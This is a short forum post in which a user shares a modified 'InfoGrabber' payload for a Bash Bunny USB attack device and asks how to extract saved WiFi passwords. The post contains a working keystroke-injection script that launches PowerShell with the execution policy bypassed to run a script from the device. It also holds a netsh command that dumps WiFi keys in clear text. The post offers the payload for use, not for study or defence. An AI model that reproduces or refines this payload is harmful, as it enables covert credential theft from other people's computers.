Hi bunny lovers,
the InfoGrabber is very nice and i have optimized the payload commands a little bit
LED SETUP
ATTACKMODE HID STORAGE
# Set your language here
DUCKY_LANG de
GET SWITCH_POSITION
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G
#Green means good to go
but there is no way for me to see any wifi password inside.
only:
when i run the:
netsh wlan show profile name=blabla-wifi key=clear
i got an .xml file with the password inside.
pls help pros!
thx,
rowie